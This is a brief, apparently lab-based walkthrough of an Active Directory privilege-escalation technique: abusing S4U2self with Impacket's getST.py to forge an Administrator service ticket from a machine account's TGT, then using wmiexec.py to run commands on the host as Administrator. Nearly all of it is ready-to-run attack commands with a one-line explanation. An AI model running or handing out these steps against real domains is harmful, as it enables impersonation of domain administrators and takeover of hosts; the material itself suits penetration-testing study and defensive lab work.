s4u2self abuse
s4u2self abuse: using the NYC$ machine account's TGT, we request a service ticket (TGS) impersonating the Administrator domain user, and rewrite the service name (altservice) to cifs/NYC.NewYork.local so the ticket can be used against the host's CIFS service.

```bash
export KRB5CCNAME=/workspace/acl/NYC.ccache
getST.py -self -impersonate "Administrator" -altservice "cifs/NYC.NewYork.local" -k -no-pass -dc-ip 192.168.56.10 "NewYork.local"/'NYC$'
```
Then we use that ticket to connect as Administrator:

```bash
export KRB5CCNAME=/workspace/acl/Administrator@cifs_NYC.NewYork.local@NewYork.LOCAL.ccache
wmiexec.py -k -no-pass NewYork.local/administrator@NYC.NewYork.local
```